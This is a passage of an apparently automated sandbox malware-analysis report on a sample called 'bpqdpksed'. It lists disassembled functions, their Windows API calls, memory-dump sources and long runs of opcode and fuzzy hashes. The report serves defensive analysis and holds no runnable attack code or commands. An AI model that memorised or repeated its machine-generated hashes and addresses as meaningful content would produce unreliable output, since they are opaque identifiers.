                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Init_thread_footer
                                                                                              • String ID: CALL
                                                                                              • API String ID: 1385522511-4196123274
                                                                                              • Opcode ID: aa5e40119138b7868ed4f50af389396e7c44c095cfd1ed11c133d4aec40e3a84
                                                                                              • Instruction ID: 7ff869146b7e63593884092964bca272ef3093c85ea85361c916996c52ee1dfc
                                                                                              • Opcode Fuzzy Hash: aa5e40119138b7868ed4f50af389396e7c44c095cfd1ed11c133d4aec40e3a84
                                                                                              • Instruction Fuzzy Hash: 6D225970608341DFC724DF14C484A6ABBE1FF98354F18895DF49A8B362E771E945CBA2
                                                                                              Function 00D641E6 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 51COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00D633E9,00E32418,?,?,?,?,?,?,?,00D632EF,?), ref: 00D64227
                                                                                                • Part of subcall function 00D684B7: _wcslen.LIBCMT ref: 00D684CA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: FullNamePath_wcslen
                                                                                              • String ID: $
                                                                                              • API String ID: 4019309064-808236599
                                                                                              • Opcode ID: 5cbe4b46741cd556bcbe0ac254f1a6be6aa3d386604c0072292217b193db2e0d
                                                                                              • Instruction ID: 117758e07be70d8180a951efd3959a57ede7df51bed11b3ec5c9351f4279514d
                                                                                              • Opcode Fuzzy Hash: 5cbe4b46741cd556bcbe0ac254f1a6be6aa3d386604c0072292217b193db2e0d
                                                                                              • Instruction Fuzzy Hash: E111C431604208ABCB40EBA49806EED77BDEF4D350F104065B685E7291DE70E788DB75
                                                                                              Function 00DBE6E1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 11COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetComputerNameW.KERNEL32(?,?), ref: 00DBE6F3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: ComputerName
                                                                                              • String ID: X64
                                                                                              • API String ID: 3545744682-893830106
                                                                                              • Opcode ID: 5ae92c6f5538a860a7e5d45e9716d544af43020e0001b60bec6d4de5060b0607
                                                                                              • Instruction ID: cc7c4df7b41d2185319fd2b4cffa1fae0a51ee19e9c10ee03ed196ca1eb86213
                                                                                              • Opcode Fuzzy Hash: 5ae92c6f5538a860a7e5d45e9716d544af43020e0001b60bec6d4de5060b0607
                                                                                              • Instruction Fuzzy Hash: A8D0C9B4805218EACB90CF80DC8CDED73BCBB18304F104895F147E2100D734E6489B70
                                                                                              Function 00DD95F6 Relevance: 3.1, APIs: 2, Instructions: 62COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00D6557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D65558,?,?,00DA4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 00D6559E
                                                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00DD9665
                                                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00DD9673
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: PrivateProfileStringWrite$FullNamePath
                                                                                              • String ID:
                                                                                              • API String ID: 3876400906-0
                                                                                              • Opcode ID: b1f376827cf709b2f0d7131c61b00b9c6eae681cb094a8cc933023872813a79a
                                                                                              • Instruction ID: d9b80ba37e9df0b19664c3b9675196f95b006b7e752af4650ad5a5254281cb49
                                                                                              • Opcode Fuzzy Hash: b1f376827cf709b2f0d7131c61b00b9c6eae681cb094a8cc933023872813a79a
                                                                                              • Instruction Fuzzy Hash: 5011F979A006159FCB00EB64C85496EB7A5FF48364B058445F856AB362CB32FD41DBA0
                                                                                              Function 00D66E52 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00D63B33,?,00008000), ref: 00D66E80
                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,00D63B33,?,00008000), ref: 00DA59A2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: c78498ec649521f350c03551ba979ac0ea740255e89b6071cd3663fbe5ffcaf4
                                                                                              • Instruction ID: 3f5584593865438b5e59c5117f6ec5ced59b96c63b7d9d02dd5d3e8e0a15ff74
                                                                                              • Opcode Fuzzy Hash: c78498ec649521f350c03551ba979ac0ea740255e89b6071cd3663fbe5ffcaf4
                                                                                              • Instruction Fuzzy Hash: DB018031145321BBE3300A2ACC0EF977F99EF02770F14C214BEA8AA1E1C7B49854CBA0
                                                                                              Function 00D632A2 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • IsThemeActive.UXTHEME ref: 00D632C4
                                                                                                • Part of subcall function 00D6326D: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00D63282
                                                                                                • Part of subcall function 00D6326D: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00D63299
                                                                                                • Part of subcall function 00D63312: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00D632EF,?), ref: 00D63342
                                                                                                • Part of subcall function 00D63312: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00D632EF,?), ref: 00D63355
                                                                                                • Part of subcall function 00D63312: GetFullPathNameW.KERNEL32(00007FFF,?,?,00E32418,00E32400,?,?,?,?,?,?,00D632EF,?), ref: 00D633C1
                                                                                                • Part of subcall function 00D63312: SetCurrentDirectoryW.KERNELBASE(?,00000001,00E32418,?,?,?,?,?,?,?,00D632EF,?), ref: 00D63442
                                                                                              • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00D632FE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                                              • String ID:
                                                                                              • API String ID: 1550534281-0
                                                                                              • Opcode ID: e33f8f83c3baa78d584e80d3e06826ef2a4b7ba6550ecb7119a11df8be0abb6a
                                                                                              • Instruction ID: 5cb94bc11f9f0e997ee02397ae7e42dc2e31c636375288e236d0113a57da607a
                                                                                              • Opcode Fuzzy Hash: e33f8f83c3baa78d584e80d3e06826ef2a4b7ba6550ecb7119a11df8be0abb6a
                                                                                              • Instruction Fuzzy Hash: 5DF030715543499FE300AF71FC0EB643FA1E705705F244409F249A62E2CBB985588B30
                                                                                              Function 00D7F95E Relevance: 3.0, APIs: 2, Instructions: 29sleeptimeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • timeGetTime.WINMM ref: 00D7F97A
                                                                                                • Part of subcall function 00D6EE07: GetInputState.USER32 ref: 00D6EEB7
                                                                                              • Sleep.KERNEL32(00000000), ref: 00DBFAC2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: InputSleepStateTimetime
                                                                                              • String ID:
                                                                                              • API String ID: 4149333218-0
                                                                                              • Opcode ID: 406bcad2e6cd6a4a36da37d01d75e4e54ad237f9c8a6810b85caa1f8d3a18a23
                                                                                              • Instruction ID: 6eec35448d468e609aba0bac5d0c4055bd5c4a62a503780848830735e7844599
                                                                                              • Opcode Fuzzy Hash: 406bcad2e6cd6a4a36da37d01d75e4e54ad237f9c8a6810b85caa1f8d3a18a23
                                                                                              • Instruction Fuzzy Hash: C6F082712407059FC314EB69D805B6AB7E6FF44351F00402AE49EC7350DB70A810CBB1
                                                                                              Function 00D68774 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000002,00000001,?,?,?,00D6AE65,?,?,?), ref: 00D68793
                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,00D6AE65,?,?,?), ref: 00D687C9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide
                                                                                              • String ID:
                                                                                              • API String ID: 626452242-0
                                                                                              • Opcode ID: d1375c517d5b73c1900a7d5b744cc3944eebbb0e61576233e5df7436ce69a267
                                                                                              • Instruction ID: 0269f17a9e6b614732277ae90d10033824214b1113d6999a1ec9cf357d134e8e
                                                                                              • Opcode Fuzzy Hash: d1375c517d5b73c1900a7d5b744cc3944eebbb0e61576233e5df7436ce69a267
                                                                                              • Instruction Fuzzy Hash: 7301F2713003047FEB18AB699C4BF7F7AAEDB84350F24413EB102DA2D0EEA0AC009234
                                                                                              Function 00D8F126 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f95420d91a4988841de692d330e4226365b46530987dd966b867e549c7a55bc9
                                                                                              • Instruction ID: ceeb6110c47a45f3d81feab3cb493e2e243afa45f86a0014d3a772bafe30eec6
                                                                                              • Opcode Fuzzy Hash: f95420d91a4988841de692d330e4226365b46530987dd966b867e549c7a55bc9
                                                                                              • Instruction Fuzzy Hash: 9D519575A00208AFDB10EF68C845FA97BB5EF85364F198168E848DB391C771ED42CBB4
                                                                                              Function 00DCFBCA Relevance: 1.6, APIs: 1, Instructions: 136COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CharLowerBuffW.USER32(?,?), ref: 00DCFBE3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: BuffCharLower
                                                                                              • String ID:
                                                                                              • API String ID: 2358735015-0
                                                                                              • Opcode ID: 2a09421f7315a37b3187666ef7bab6302756ad6d54f3bcc12f87bad916ba7bf0
                                                                                              • Instruction ID: 23aa6eec325e8d973a329b984b3d676c652ea05ace24de82ee4bb43127b68b94
                                                                                              • Opcode Fuzzy Hash: 2a09421f7315a37b3187666ef7bab6302756ad6d54f3bcc12f87bad916ba7bf0
                                                                                              • Instruction Fuzzy Hash: B94192B260020AAFCB15EF64C881EEE77B9EF48314B15853EE956D7241EB70DA45CB70
                                                                                              Function 00D80000 Relevance: 1.6, APIs: 1, Instructions: 94processCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateProcess
                                                                                              • String ID:
                                                                                              • API String ID: 963392458-0
                                                                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                              • Instruction ID: 35fd70ec958911953cab2f3e9d31c32985aad61031832e1a9fe9855fe27e14b5
                                                                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                              • Instruction Fuzzy Hash: 5431D370A00105DFC798EF58C490A69FBA6FB59300B6886A5E44ACB356D732EDC5CBE0
                                                                                              Function 00DD8E39 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00D6557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D65558,?,?,00DA4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 00D6559E
                                                                                              • GetPrivateProfileStringW.KERNEL32(?,?,?,?,0000FFFF,?), ref: 00DD8EBE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: FullNamePathPrivateProfileString
                                                                                              • String ID:
                                                                                              • API String ID: 1991638491-0
                                                                                              • Opcode ID: d2dd161b12ceb4b5975f974fed4dd6c0830f652e09de6fb9f2c9d9eafbc7b202
                                                                                              • Instruction ID: bbb43cfab835299f6971f68c82a61dc44e43a91c67ba10f17e7af8957a9c7cfe
                                                                                              • Opcode Fuzzy Hash: d2dd161b12ceb4b5975f974fed4dd6c0830f652e09de6fb9f2c9d9eafbc7b202
                                                                                              • Instruction Fuzzy Hash: F9210E35A00605AFCB11EB64C946CAEBBB5EF49360B044154F946AB362CB31FD85DBB0
                                                                                              Function 00D6636D Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00D66332: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00D6637F,?,?,00D660AA,?,00000001,?,?,00000000), ref: 00D6633E
                                                                                                • Part of subcall function 00D66332: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00D66350
                                                                                                • Part of subcall function 00D66332: FreeLibrary.KERNEL32(00000000,?,?,00D6637F,?,?,00D660AA,?,00000001,?,?,00000000), ref: 00D66362
                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00D660AA,?,00000001,?,?,00000000), ref: 00D6639F
                                                                                                • Part of subcall function 00D662FB: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00DA54C3,?,?,00D660AA,?,00000001,?,?,00000000), ref: 00D66304
                                                                                                • Part of subcall function 00D662FB: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00D66316
                                                                                                • Part of subcall function 00D662FB: FreeLibrary.KERNEL32(00000000,?,?,00DA54C3,?,?,00D660AA,?,00000001,?,?,00000000), ref: 00D66329
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$Load$AddressFreeProc
                                                                                              • String ID:
                                                                                              • API String ID: 2632591731-0
                                                                                              • Opcode ID: 4da2a192d702f2b198ed9d9b0f087462abe09e012008a81f3a99b7885b8912b4
                                                                                              • Instruction ID: 2d83c2f2c04079f5766a0ea41070805a5639d6339ed1bfdd9968cdc6b40356ea
                                                                                              • Opcode Fuzzy Hash: 4da2a192d702f2b198ed9d9b0f087462abe09e012008a81f3a99b7885b8912b4
                                                                                              • Instruction Fuzzy Hash: 1011E731640215ABCF14BB34DC02AAD77A5DF54B11F14842DF483AA2D1EEB5DA499BB0
                                                                                              Function 00D98792 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: __wsopen_s
                                                                                              • String ID:
                                                                                              • API String ID: 3347428461-0
                                                                                              • Opcode ID: baaba607c463faeb7d0f2fecb9d8c127e3657d64f1f2e6ac20aec91505af7fec
                                                                                              • Instruction ID: 5085f89b34fd6159dc30394e869d73aaeef3911f3799f1fd556a4b6c95096fd8
                                                                                              • Opcode Fuzzy Hash: baaba607c463faeb7d0f2fecb9d8c127e3657d64f1f2e6ac20aec91505af7fec
                                                                                              • Instruction Fuzzy Hash: 6F115A7190420AAFCF05DF98E94099E7BF5EF49310F1040A9F808AB311DA31EE11DBB5
                                                                                              Function 00D6B050 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ReadFile.KERNELBASE(?,?,00010000,00000000,00000000,?,?,00000000,?,00D66B73,?,00010000,00000000,00000000,00000000,00000000), ref: 00D6B0AC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileRead
                                                                                              • String ID:
                                                                                              • API String ID: 2738559852-0
                                                                                              • Opcode ID: f5bcb49a3b1c41f7e09bad1e4fafda9c62b32622e2207ec4d77fae80cf5f20ea
                                                                                              • Instruction ID: 6ff3823e2ba9e04bb9b64db7327b6435c999113c43a4028f8bf652147ce538d5
                                                                                              • Opcode Fuzzy Hash: f5bcb49a3b1c41f7e09bad1e4fafda9c62b32622e2207ec4d77fae80cf5f20ea
                                                                                              • Instruction Fuzzy Hash: 85113631200B05DFD7208F15C880B67BBE9EF46364F14C52EE9AA8BA50C772E985CB60
                                                                                              Function 00D95390 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00D9500D: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00D931B9,00000001,00000364,?,?,?,0000000A,00000000), ref: 00D9504E
                                                                                              • _free.LIBCMT ref: 00D953FC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
